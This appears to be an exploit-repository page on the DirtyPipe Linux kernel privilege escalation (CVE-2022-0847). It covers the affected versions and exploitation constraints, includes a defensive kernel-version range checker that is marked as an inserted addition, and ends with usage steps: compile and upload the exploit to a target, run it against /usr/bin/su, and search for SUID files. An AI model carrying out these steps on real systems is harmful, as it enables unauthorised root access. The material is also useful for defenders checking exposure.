0day/98-Linux Privilege Escalation/CVE-2022-0847-DirtyPipe Privilege Escalation
2023-06-15 14:28:45 +08:00

Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)

Vulnerability description

The vulnerability is similar to Dirty Cow (CVE-2016-5195), but it is easier to exploit.

Exploitation constraints

  1. The attacker must have read permissions (because it needs to splice() a page into a pipe).
  2. The offset must not be on a page boundary (because at least one byte of that page must have been spliced into the pipe).
  3. The write cannot cross a page boundary (because a new anonymous buffer would be created for the rest).
  4. The file cannot be resized (because the pipe has its own page fill management and does not tell the page cache how much data has been appended).
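The affected range given in the title (5.8 up to, but not including, 5.16.11) is the first thing a defender checks on a host. The following script is an added example, not part of this repository's code: it parses a `uname -r` style release string into a version tuple and reports whether it falls inside that range. The sample release strings are constructed for illustration, and the comparison assumes mainline version numbering; distribution kernels often carry the fix as a backport without changing the version, so a hit means "check the vendor advisory", not "confirmed exposed".

```python
import platform
import re

# Range stated on the page: Linux 5.8 <= version < 5.16.11.
AFFECTED_MIN = (5, 8, 0)
FIXED_AT = (5, 16, 11)

# Accepts strings such as "5.10.0-21-amd64" or "5.16.10"; trailing distro
# suffixes after the numeric part are ignored.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def parse_kernel_version(release: str) -> tuple:
    """Turn a `uname -r` string into a (major, minor, patch) tuple."""
    m = _VERSION_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release string: {release!r}")
    major, minor, patch = m.group(1), m.group(2), m.group(3) or "0"
    return (int(major), int(minor), int(patch))


def in_affected_range(release: str) -> bool:
    """True if the mainline version lies in [5.8, 5.16.11)."""
    return AFFECTED_MIN <= parse_kernel_version(release) < FIXED_AT


def assess(release: str) -> str:
    """Human-readable verdict; the caveat about backports is deliberate."""
    if in_affected_range(release):
        return (f"{release}: inside the CVE-2022-0847 affected range; "
                "verify vendor backports before treating the host as exposed")
    return f"{release}: outside the affected range"


def assess_running_kernel() -> str:
    """Assumption: run on Linux, where platform.release() returns `uname -r`."""
    return assess(platform.release())


if __name__ == "__main__":
    # Constructed sample release strings, then the live host.
    for sample in ["5.7.19", "5.8.0-63-generic", "5.10.0-21-amd64",
                   "5.16.10", "5.16.11", "6.1.0"]:
        print(assess(sample))
    print(assess_running_kernel())
```

Run it as `python3 check_dirtypipe_range.py` on the host under review; the sample lines show the boundary behaviour (5.16.10 is flagged, 5.16.11 is not).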

Usage

bash exploit.sh
# or run
bash Dirty-Pipe.sh

Compiling the source locally and uploading it to the target

gcc pipesource.c -o pipesource

Then upload pipesource to the target server and run ./pipesource /usr/bin/su

Here /usr/bin/su is a file with the SUID bit set.
Such files can be located with: find / -perm -u=s -type f